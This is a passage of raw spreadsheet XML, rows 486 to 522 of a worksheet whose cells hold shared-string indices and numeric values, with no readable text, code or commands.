      <c r="B486" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C486" s="14" t="s">
        <v>1107</v>
      </c>
      <c r="D486" s="6">
        <v>1</v>
      </c>
      <c r="E486" s="6">
        <v>404</v>
      </c>
      <c r="F486" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G486" s="6">
        <v>492</v>
      </c>
      <c r="H486" s="6">
        <v>424</v>
      </c>
      <c r="I486" s="6">
        <v>0</v>
      </c>
      <c r="J486" s="6">
        <v>331</v>
      </c>
      <c r="K486" s="6">
        <v>69134</v>
      </c>
      <c r="L486" s="11"/>
      <c r="M486" s="11"/>
      <c r="N486" s="11" t="s">
        <v>1108</v>
      </c>
    </row>
    <row r="487" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A487" s="3">
        <v>486</v>
      </c>
      <c r="B487" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C487" s="14" t="s">
        <v>1109</v>
      </c>
      <c r="D487" s="6">
        <v>1</v>
      </c>
      <c r="E487" s="6">
        <v>404</v>
      </c>
      <c r="F487" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G487" s="6">
        <v>492</v>
      </c>
      <c r="H487" s="6">
        <v>433</v>
      </c>
      <c r="I487" s="6">
        <v>0</v>
      </c>
      <c r="J487" s="6">
        <v>331</v>
      </c>
      <c r="K487" s="6">
        <v>69134</v>
      </c>
      <c r="L487" s="11"/>
      <c r="M487" s="11"/>
      <c r="N487" s="11" t="s">
        <v>1110</v>
      </c>
    </row>
    <row r="488" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A488" s="3">
        <v>487</v>
      </c>
      <c r="B488" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C488" s="14" t="s">
        <v>1111</v>
      </c>
      <c r="D488" s="6">
        <v>1</v>
      </c>
      <c r="E488" s="6">
        <v>404</v>
      </c>
      <c r="F488" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G488" s="6">
        <v>490</v>
      </c>
      <c r="H488" s="6">
        <v>443</v>
      </c>
      <c r="I488" s="6">
        <v>0</v>
      </c>
      <c r="J488" s="6">
        <v>331</v>
      </c>
      <c r="K488" s="6">
        <v>69134</v>
      </c>
      <c r="L488" s="11"/>
      <c r="M488" s="11"/>
      <c r="N488" s="11" t="s">
        <v>1112</v>
      </c>
    </row>
    <row r="489" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A489" s="3">
        <v>488</v>
      </c>
      <c r="B489" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C489" s="14" t="s">
        <v>1114</v>
      </c>
      <c r="D489" s="6">
        <v>1</v>
      </c>
      <c r="E489" s="6">
        <v>404</v>
      </c>
      <c r="F489" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G489" s="6">
        <v>506</v>
      </c>
      <c r="H489" s="6">
        <v>453</v>
      </c>
      <c r="I489" s="6">
        <v>0</v>
      </c>
      <c r="J489" s="6">
        <v>331</v>
      </c>
      <c r="K489" s="6">
        <v>69134</v>
      </c>
      <c r="L489" s="11"/>
      <c r="M489" s="11"/>
      <c r="N489" s="11" t="s">
        <v>1115</v>
      </c>
    </row>
    <row r="490" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A490" s="3">
        <v>489</v>
      </c>
      <c r="B490" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C490" s="14" t="s">
        <v>1116</v>
      </c>
      <c r="D490" s="6">
        <v>1</v>
      </c>
      <c r="E490" s="6">
        <v>404</v>
      </c>
      <c r="F490" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G490" s="6">
        <v>511</v>
      </c>
      <c r="H490" s="6">
        <v>462</v>
      </c>
      <c r="I490" s="6">
        <v>0</v>
      </c>
      <c r="J490" s="6">
        <v>331</v>
      </c>
      <c r="K490" s="6">
        <v>69134</v>
      </c>
      <c r="L490" s="11"/>
      <c r="M490" s="11"/>
      <c r="N490" s="11" t="s">
        <v>1117</v>
      </c>
    </row>
    <row r="491" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A491" s="3">
        <v>490</v>
      </c>
      <c r="B491" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C491" s="14" t="s">
        <v>1118</v>
      </c>
      <c r="D491" s="6">
        <v>1</v>
      </c>
      <c r="E491" s="6">
        <v>404</v>
      </c>
      <c r="F491" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G491" s="6">
        <v>517</v>
      </c>
      <c r="H491" s="6">
        <v>471</v>
      </c>
      <c r="I491" s="6">
        <v>0</v>
      </c>
      <c r="J491" s="6">
        <v>331</v>
      </c>
      <c r="K491" s="6">
        <v>69134</v>
      </c>
      <c r="L491" s="11"/>
      <c r="M491" s="11"/>
      <c r="N491" s="11" t="s">
        <v>1119</v>
      </c>
    </row>
    <row r="492" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A492" s="3">
        <v>491</v>
      </c>
      <c r="B492" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C492" s="14" t="s">
        <v>1120</v>
      </c>
      <c r="D492" s="6">
        <v>1</v>
      </c>
      <c r="E492" s="6">
        <v>404</v>
      </c>
      <c r="F492" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G492" s="6">
        <v>506</v>
      </c>
      <c r="H492" s="6">
        <v>481</v>
      </c>
      <c r="I492" s="6">
        <v>0</v>
      </c>
      <c r="J492" s="6">
        <v>331</v>
      </c>
      <c r="K492" s="6">
        <v>69134</v>
      </c>
      <c r="L492" s="11"/>
      <c r="M492" s="11"/>
      <c r="N492" s="11" t="s">
        <v>1121</v>
      </c>
    </row>
    <row r="493" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A493" s="3">
        <v>492</v>
      </c>
      <c r="B493" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C493" s="14" t="s">
        <v>1122</v>
      </c>
      <c r="D493" s="6">
        <v>1</v>
      </c>
      <c r="E493" s="6">
        <v>404</v>
      </c>
      <c r="F493" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G493" s="6">
        <v>547</v>
      </c>
      <c r="H493" s="6">
        <v>490</v>
      </c>
      <c r="I493" s="6">
        <v>0</v>
      </c>
      <c r="J493" s="6">
        <v>331</v>
      </c>
      <c r="K493" s="6">
        <v>69134</v>
      </c>
      <c r="L493" s="11"/>
      <c r="M493" s="11"/>
      <c r="N493" s="11" t="s">
        <v>1123</v>
      </c>
    </row>
    <row r="494" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A494" s="3">
        <v>493</v>
      </c>
      <c r="B494" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C494" s="14" t="s">
        <v>1124</v>
      </c>
      <c r="D494" s="6">
        <v>1</v>
      </c>
      <c r="E494" s="6">
        <v>404</v>
      </c>
      <c r="F494" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G494" s="6">
        <v>589</v>
      </c>
      <c r="H494" s="6">
        <v>499</v>
      </c>
      <c r="I494" s="6">
        <v>0</v>
      </c>
      <c r="J494" s="6">
        <v>331</v>
      </c>
      <c r="K494" s="6">
        <v>69134</v>
      </c>
      <c r="L494" s="11"/>
      <c r="M494" s="11"/>
      <c r="N494" s="11" t="s">
        <v>1125</v>
      </c>
    </row>
    <row r="495" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A495" s="3">
        <v>494</v>
      </c>
      <c r="B495" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C495" s="14" t="s">
        <v>1126</v>
      </c>
      <c r="D495" s="6">
        <v>1</v>
      </c>
      <c r="E495" s="6">
        <v>404</v>
      </c>
      <c r="F495" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G495" s="6">
        <v>564</v>
      </c>
      <c r="H495" s="6">
        <v>509</v>
      </c>
      <c r="I495" s="6">
        <v>0</v>
      </c>
      <c r="J495" s="6">
        <v>331</v>
      </c>
      <c r="K495" s="6">
        <v>69134</v>
      </c>
      <c r="L495" s="11"/>
      <c r="M495" s="11"/>
      <c r="N495" s="11" t="s">
        <v>1127</v>
      </c>
    </row>
    <row r="496" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A496" s="3">
        <v>495</v>
      </c>
      <c r="B496" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C496" s="14" t="s">
        <v>1128</v>
      </c>
      <c r="D496" s="6">
        <v>1</v>
      </c>
      <c r="E496" s="6">
        <v>404</v>
      </c>
      <c r="F496" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G496" s="6">
        <v>623</v>
      </c>
      <c r="H496" s="6">
        <v>519</v>
      </c>
      <c r="I496" s="6">
        <v>0</v>
      </c>
      <c r="J496" s="6">
        <v>331</v>
      </c>
      <c r="K496" s="6">
        <v>69134</v>
      </c>
      <c r="L496" s="11"/>
      <c r="M496" s="11"/>
      <c r="N496" s="11" t="s">
        <v>1129</v>
      </c>
    </row>
    <row r="497" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A497" s="3">
        <v>496</v>
      </c>
      <c r="B497" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C497" s="14" t="s">
        <v>1130</v>
      </c>
      <c r="D497" s="6">
        <v>1</v>
      </c>
      <c r="E497" s="6">
        <v>404</v>
      </c>
      <c r="F497" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G497" s="6">
        <v>676</v>
      </c>
      <c r="H497" s="6">
        <v>529</v>
      </c>
      <c r="I497" s="6">
        <v>0</v>
      </c>
      <c r="J497" s="6">
        <v>331</v>
      </c>
      <c r="K497" s="6">
        <v>69134</v>
      </c>
      <c r="L497" s="11"/>
      <c r="M497" s="11"/>
      <c r="N497" s="11" t="s">
        <v>1131</v>
      </c>
    </row>
    <row r="498" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A498" s="3">
        <v>497</v>
      </c>
      <c r="B498" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C498" s="14" t="s">
        <v>1133</v>
      </c>
      <c r="D498" s="6">
        <v>1</v>
      </c>
      <c r="E498" s="6">
        <v>404</v>
      </c>
      <c r="F498" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G498" s="6">
        <v>659</v>
      </c>
      <c r="H498" s="6">
        <v>539</v>
      </c>
      <c r="I498" s="6">
        <v>0</v>
      </c>
      <c r="J498" s="6">
        <v>331</v>
      </c>
      <c r="K498" s="6">
        <v>69134</v>
      </c>
      <c r="L498" s="11"/>
      <c r="M498" s="11"/>
      <c r="N498" s="11" t="s">
        <v>1134</v>
      </c>
    </row>
    <row r="499" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A499" s="3">
        <v>498</v>
      </c>
      <c r="B499" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C499" s="14" t="s">
        <v>1135</v>
      </c>
      <c r="D499" s="6">
        <v>1</v>
      </c>
      <c r="E499" s="6">
        <v>404</v>
      </c>
      <c r="F499" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G499" s="6">
        <v>632</v>
      </c>
      <c r="H499" s="6">
        <v>549</v>
      </c>
      <c r="I499" s="6">
        <v>0</v>
      </c>
      <c r="J499" s="6">
        <v>331</v>
      </c>
      <c r="K499" s="6">
        <v>69134</v>
      </c>
      <c r="L499" s="11"/>
      <c r="M499" s="11"/>
      <c r="N499" s="11" t="s">
        <v>1136</v>
      </c>
    </row>
    <row r="500" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A500" s="3">
        <v>499</v>
      </c>
      <c r="B500" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C500" s="14" t="s">
        <v>1137</v>
      </c>
      <c r="D500" s="6">
        <v>1</v>
      </c>
      <c r="E500" s="6">
        <v>404</v>
      </c>
      <c r="F500" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G500" s="6">
        <v>673</v>
      </c>
      <c r="H500" s="6">
        <v>540</v>
      </c>
      <c r="I500" s="6">
        <v>0</v>
      </c>
      <c r="J500" s="6">
        <v>331</v>
      </c>
      <c r="K500" s="6">
        <v>69134</v>
      </c>
      <c r="L500" s="11"/>
      <c r="M500" s="11"/>
      <c r="N500" s="11" t="s">
        <v>1138</v>
      </c>
    </row>
    <row r="501" spans="1:14" ht="68" x14ac:dyDescent="0.2">
      <c r="A501" s="3">
        <v>500</v>
      </c>
      <c r="B501" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C501" s="14" t="s">
        <v>1139</v>
      </c>
      <c r="D501" s="6">
        <v>1</v>
      </c>
      <c r="E501" s="6">
        <v>404</v>
      </c>
      <c r="F501" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G501" s="6">
        <v>639</v>
      </c>
      <c r="H501" s="6">
        <v>573</v>
      </c>
      <c r="I501" s="6">
        <v>0</v>
      </c>
      <c r="J501" s="6">
        <v>331</v>
      </c>
      <c r="K501" s="6">
        <v>69134</v>
      </c>
      <c r="L501" s="11"/>
      <c r="M501" s="11"/>
      <c r="N501" s="11" t="s">
        <v>1140</v>
      </c>
    </row>
    <row r="502" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A502" s="3">
        <v>501</v>
      </c>
      <c r="B502" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C502" s="14" t="s">
        <v>1141</v>
      </c>
      <c r="D502" s="6">
        <v>1</v>
      </c>
      <c r="E502" s="6">
        <v>404</v>
      </c>
      <c r="F502" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G502" s="6">
        <v>610</v>
      </c>
      <c r="H502" s="6">
        <v>515</v>
      </c>
      <c r="I502" s="6">
        <v>0</v>
      </c>
      <c r="J502" s="6">
        <v>331</v>
      </c>
      <c r="K502" s="6">
        <v>69134</v>
      </c>
      <c r="L502" s="11"/>
      <c r="M502" s="11"/>
      <c r="N502" s="11" t="s">
        <v>1142</v>
      </c>
    </row>
    <row r="503" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A503" s="3">
        <v>502</v>
      </c>
      <c r="B503" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C503" s="14" t="s">
        <v>1143</v>
      </c>
      <c r="D503" s="6">
        <v>1</v>
      </c>
      <c r="E503" s="6">
        <v>404</v>
      </c>
      <c r="F503" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G503" s="6">
        <v>573</v>
      </c>
      <c r="H503" s="6">
        <v>552</v>
      </c>
      <c r="I503" s="6">
        <v>0</v>
      </c>
      <c r="J503" s="6">
        <v>331</v>
      </c>
      <c r="K503" s="6">
        <v>69134</v>
      </c>
      <c r="L503" s="11"/>
      <c r="M503" s="11"/>
      <c r="N503" s="11" t="s">
        <v>1144</v>
      </c>
    </row>
    <row r="504" spans="1:14" ht="17" x14ac:dyDescent="0.2">
      <c r="A504" s="3">
        <v>503</v>
      </c>
      <c r="B504" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C504" s="14" t="s">
        <v>1145</v>
      </c>
      <c r="D504" s="6">
        <v>1</v>
      </c>
      <c r="E504" s="6">
        <v>503</v>
      </c>
      <c r="F504" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G504" s="6">
        <v>518</v>
      </c>
      <c r="H504" s="6">
        <v>375</v>
      </c>
      <c r="I504" s="6">
        <v>0</v>
      </c>
      <c r="J504" s="6">
        <v>399</v>
      </c>
      <c r="K504" s="6">
        <v>35</v>
      </c>
      <c r="L504" s="11"/>
      <c r="M504" s="11"/>
      <c r="N504" s="11" t="s">
        <v>1146</v>
      </c>
    </row>
    <row r="505" spans="1:14" ht="17" x14ac:dyDescent="0.2">
      <c r="A505" s="3">
        <v>504</v>
      </c>
      <c r="B505" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C505" s="14" t="s">
        <v>1147</v>
      </c>
      <c r="D505" s="6">
        <v>1</v>
      </c>
      <c r="E505" s="6">
        <v>503</v>
      </c>
      <c r="F505" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G505" s="6">
        <v>477</v>
      </c>
      <c r="H505" s="6">
        <v>377</v>
      </c>
      <c r="I505" s="6">
        <v>0</v>
      </c>
      <c r="J505" s="6">
        <v>399</v>
      </c>
      <c r="K505" s="6">
        <v>35</v>
      </c>
      <c r="L505" s="11"/>
      <c r="M505" s="11"/>
      <c r="N505" s="11" t="s">
        <v>1148</v>
      </c>
    </row>
    <row r="506" spans="1:14" ht="17" x14ac:dyDescent="0.2">
      <c r="A506" s="3">
        <v>505</v>
      </c>
      <c r="B506" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C506" s="14" t="s">
        <v>1150</v>
      </c>
      <c r="D506" s="6">
        <v>1</v>
      </c>
      <c r="E506" s="6">
        <v>503</v>
      </c>
      <c r="F506" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G506" s="6">
        <v>444</v>
      </c>
      <c r="H506" s="6">
        <v>379</v>
      </c>
      <c r="I506" s="6">
        <v>0</v>
      </c>
      <c r="J506" s="6">
        <v>399</v>
      </c>
      <c r="K506" s="6">
        <v>35</v>
      </c>
      <c r="L506" s="11"/>
      <c r="M506" s="11"/>
      <c r="N506" s="11" t="s">
        <v>1151</v>
      </c>
    </row>
    <row r="507" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A507" s="3">
        <v>506</v>
      </c>
      <c r="B507" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C507" s="14" t="s">
        <v>1152</v>
      </c>
      <c r="D507" s="6">
        <v>1</v>
      </c>
      <c r="E507" s="6">
        <v>503</v>
      </c>
      <c r="F507" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G507" s="6">
        <v>421</v>
      </c>
      <c r="H507" s="6">
        <v>381</v>
      </c>
      <c r="I507" s="6">
        <v>0</v>
      </c>
      <c r="J507" s="6">
        <v>399</v>
      </c>
      <c r="K507" s="6">
        <v>35</v>
      </c>
      <c r="L507" s="11"/>
      <c r="M507" s="11"/>
      <c r="N507" s="11" t="s">
        <v>1153</v>
      </c>
    </row>
    <row r="508" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A508" s="3">
        <v>507</v>
      </c>
      <c r="B508" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C508" s="14" t="s">
        <v>1154</v>
      </c>
      <c r="D508" s="6">
        <v>1</v>
      </c>
      <c r="E508" s="6">
        <v>503</v>
      </c>
      <c r="F508" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G508" s="6">
        <v>410</v>
      </c>
      <c r="H508" s="6">
        <v>383</v>
      </c>
      <c r="I508" s="6">
        <v>0</v>
      </c>
      <c r="J508" s="6">
        <v>399</v>
      </c>
      <c r="K508" s="6">
        <v>35</v>
      </c>
      <c r="L508" s="11"/>
      <c r="M508" s="11"/>
      <c r="N508" s="11" t="s">
        <v>1155</v>
      </c>
    </row>
    <row r="509" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A509" s="3">
        <v>508</v>
      </c>
      <c r="B509" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C509" s="14" t="s">
        <v>1156</v>
      </c>
      <c r="D509" s="6">
        <v>1</v>
      </c>
      <c r="E509" s="6">
        <v>503</v>
      </c>
      <c r="F509" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G509" s="6">
        <v>425</v>
      </c>
      <c r="H509" s="6">
        <v>385</v>
      </c>
      <c r="I509" s="6">
        <v>0</v>
      </c>
      <c r="J509" s="6">
        <v>399</v>
      </c>
      <c r="K509" s="6">
        <v>35</v>
      </c>
      <c r="L509" s="11"/>
      <c r="M509" s="11"/>
      <c r="N509" s="11" t="s">
        <v>1157</v>
      </c>
    </row>
    <row r="510" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A510" s="3">
        <v>509</v>
      </c>
      <c r="B510" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C510" s="14" t="s">
        <v>1158</v>
      </c>
      <c r="D510" s="6">
        <v>1</v>
      </c>
      <c r="E510" s="6">
        <v>503</v>
      </c>
      <c r="F510" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G510" s="6">
        <v>421</v>
      </c>
      <c r="H510" s="6">
        <v>387</v>
      </c>
      <c r="I510" s="6">
        <v>0</v>
      </c>
      <c r="J510" s="6">
        <v>399</v>
      </c>
      <c r="K510" s="6">
        <v>35</v>
      </c>
      <c r="L510" s="11"/>
      <c r="M510" s="11"/>
      <c r="N510" s="11" t="s">
        <v>1159</v>
      </c>
    </row>
    <row r="511" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A511" s="3">
        <v>510</v>
      </c>
      <c r="B511" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C511" s="14" t="s">
        <v>1160</v>
      </c>
      <c r="D511" s="6">
        <v>1</v>
      </c>
      <c r="E511" s="6">
        <v>503</v>
      </c>
      <c r="F511" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G511" s="6">
        <v>411</v>
      </c>
      <c r="H511" s="6">
        <v>389</v>
      </c>
      <c r="I511" s="6">
        <v>0</v>
      </c>
      <c r="J511" s="6">
        <v>399</v>
      </c>
      <c r="K511" s="6">
        <v>35</v>
      </c>
      <c r="L511" s="11"/>
      <c r="M511" s="11"/>
      <c r="N511" s="11" t="s">
        <v>1161</v>
      </c>
    </row>
    <row r="512" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A512" s="3">
        <v>511</v>
      </c>
      <c r="B512" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C512" s="14" t="s">
        <v>1162</v>
      </c>
      <c r="D512" s="6">
        <v>1</v>
      </c>
      <c r="E512" s="6">
        <v>503</v>
      </c>
      <c r="F512" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G512" s="6">
        <v>406</v>
      </c>
      <c r="H512" s="6">
        <v>391</v>
      </c>
      <c r="I512" s="6">
        <v>0</v>
      </c>
      <c r="J512" s="6">
        <v>399</v>
      </c>
      <c r="K512" s="6">
        <v>35</v>
      </c>
      <c r="L512" s="11"/>
      <c r="M512" s="11"/>
      <c r="N512" s="11" t="s">
        <v>1163</v>
      </c>
    </row>
    <row r="513" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A513" s="3">
        <v>512</v>
      </c>
      <c r="B513" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C513" s="14" t="s">
        <v>1164</v>
      </c>
      <c r="D513" s="6">
        <v>1</v>
      </c>
      <c r="E513" s="6">
        <v>503</v>
      </c>
      <c r="F513" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G513" s="6">
        <v>425</v>
      </c>
      <c r="H513" s="6">
        <v>394</v>
      </c>
      <c r="I513" s="6">
        <v>0</v>
      </c>
      <c r="J513" s="6">
        <v>399</v>
      </c>
      <c r="K513" s="6">
        <v>35</v>
      </c>
      <c r="L513" s="11"/>
      <c r="M513" s="11"/>
      <c r="N513" s="11" t="s">
        <v>1165</v>
      </c>
    </row>
    <row r="514" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A514" s="3">
        <v>513</v>
      </c>
      <c r="B514" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C514" s="14" t="s">
        <v>1166</v>
      </c>
      <c r="D514" s="6">
        <v>1</v>
      </c>
      <c r="E514" s="6">
        <v>503</v>
      </c>
      <c r="F514" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G514" s="6">
        <v>420</v>
      </c>
      <c r="H514" s="6">
        <v>397</v>
      </c>
      <c r="I514" s="6">
        <v>0</v>
      </c>
      <c r="J514" s="6">
        <v>399</v>
      </c>
      <c r="K514" s="6">
        <v>35</v>
      </c>
      <c r="L514" s="11"/>
      <c r="M514" s="11"/>
      <c r="N514" s="11" t="s">
        <v>1167</v>
      </c>
    </row>
    <row r="515" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A515" s="3">
        <v>514</v>
      </c>
      <c r="B515" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C515" s="14" t="s">
        <v>1168</v>
      </c>
      <c r="D515" s="6">
        <v>1</v>
      </c>
      <c r="E515" s="6">
        <v>503</v>
      </c>
      <c r="F515" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G515" s="6">
        <v>431</v>
      </c>
      <c r="H515" s="6">
        <v>400</v>
      </c>
      <c r="I515" s="6">
        <v>0</v>
      </c>
      <c r="J515" s="6">
        <v>399</v>
      </c>
      <c r="K515" s="6">
        <v>35</v>
      </c>
      <c r="L515" s="11"/>
      <c r="M515" s="11"/>
      <c r="N515" s="11" t="s">
        <v>1169</v>
      </c>
    </row>
    <row r="516" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A516" s="3">
        <v>515</v>
      </c>
      <c r="B516" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C516" s="14" t="s">
        <v>1170</v>
      </c>
      <c r="D516" s="6">
        <v>1</v>
      </c>
      <c r="E516" s="6">
        <v>503</v>
      </c>
      <c r="F516" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G516" s="6">
        <v>439</v>
      </c>
      <c r="H516" s="6">
        <v>403</v>
      </c>
      <c r="I516" s="6">
        <v>0</v>
      </c>
      <c r="J516" s="6">
        <v>399</v>
      </c>
      <c r="K516" s="6">
        <v>35</v>
      </c>
      <c r="L516" s="11"/>
      <c r="M516" s="11"/>
      <c r="N516" s="11" t="s">
        <v>1171</v>
      </c>
    </row>
    <row r="517" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A517" s="3">
        <v>516</v>
      </c>
      <c r="B517" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C517" s="14" t="s">
        <v>1173</v>
      </c>
      <c r="D517" s="6">
        <v>1</v>
      </c>
      <c r="E517" s="6">
        <v>503</v>
      </c>
      <c r="F517" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G517" s="6">
        <v>442</v>
      </c>
      <c r="H517" s="6">
        <v>406</v>
      </c>
      <c r="I517" s="6">
        <v>0</v>
      </c>
      <c r="J517" s="6">
        <v>399</v>
      </c>
      <c r="K517" s="6">
        <v>35</v>
      </c>
      <c r="L517" s="11"/>
      <c r="M517" s="11"/>
      <c r="N517" s="11" t="s">
        <v>1174</v>
      </c>
    </row>
    <row r="518" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A518" s="3">
        <v>517</v>
      </c>
      <c r="B518" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C518" s="14" t="s">
        <v>1175</v>
      </c>
      <c r="D518" s="6">
        <v>1</v>
      </c>
      <c r="E518" s="6">
        <v>503</v>
      </c>
      <c r="F518" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G518" s="6">
        <v>459</v>
      </c>
      <c r="H518" s="6">
        <v>409</v>
      </c>
      <c r="I518" s="6">
        <v>0</v>
      </c>
      <c r="J518" s="6">
        <v>399</v>
      </c>
      <c r="K518" s="6">
        <v>35</v>
      </c>
      <c r="L518" s="11"/>
      <c r="M518" s="11"/>
      <c r="N518" s="11" t="s">
        <v>1176</v>
      </c>
    </row>
    <row r="519" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A519" s="3">
        <v>518</v>
      </c>
      <c r="B519" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C519" s="14" t="s">
        <v>1177</v>
      </c>
      <c r="D519" s="6">
        <v>1</v>
      </c>
      <c r="E519" s="6">
        <v>503</v>
      </c>
      <c r="F519" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G519" s="6">
        <v>477</v>
      </c>
      <c r="H519" s="6">
        <v>412</v>
      </c>
      <c r="I519" s="6">
        <v>0</v>
      </c>
      <c r="J519" s="6">
        <v>399</v>
      </c>
      <c r="K519" s="6">
        <v>35</v>
      </c>
      <c r="L519" s="11"/>
      <c r="M519" s="11"/>
      <c r="N519" s="11" t="s">
        <v>1178</v>
      </c>
    </row>
    <row r="520" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A520" s="3">
        <v>519</v>
      </c>
      <c r="B520" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C520" s="14" t="s">
        <v>1179</v>
      </c>
      <c r="D520" s="6">
        <v>1</v>
      </c>
      <c r="E520" s="6">
        <v>503</v>
      </c>
      <c r="F520" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G520" s="6">
        <v>459</v>
      </c>
      <c r="H520" s="6">
        <v>415</v>
      </c>
      <c r="I520" s="6">
        <v>0</v>
      </c>
      <c r="J520" s="6">
        <v>399</v>
      </c>
      <c r="K520" s="6">
        <v>35</v>
      </c>
      <c r="L520" s="11"/>
      <c r="M520" s="11"/>
      <c r="N520" s="11" t="s">
        <v>1180</v>
      </c>
    </row>
    <row r="521" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A521" s="3">
        <v>520</v>
      </c>
      <c r="B521" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C521" s="14" t="s">
        <v>1181</v>
      </c>
      <c r="D521" s="6">
        <v>1</v>
      </c>
      <c r="E521" s="6">
        <v>503</v>
      </c>
      <c r="F521" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G521" s="6">
        <v>488</v>
      </c>
      <c r="H521" s="6">
        <v>418</v>
      </c>
      <c r="I521" s="6">
        <v>0</v>
      </c>
      <c r="J521" s="6">
        <v>399</v>
      </c>
      <c r="K521" s="6">
        <v>35</v>
      </c>
      <c r="L521" s="11"/>
      <c r="M521" s="11"/>
      <c r="N521" s="11" t="s">
        <v>1182</v>
      </c>
    </row>
    <row r="522" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A522" s="3">
        <v>521</v>
      </c>
      <c r="B522" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C522" s="14" t="s">
        <v>1183</v>
      </c>
      <c r="D522" s="6">
        <v>1</v>
      </c>
      <c r="E522" s="6">
        <v>503</v>
      </c>
      <c r="F522" s="11" t="s">
        <v>53</v>
      </c>
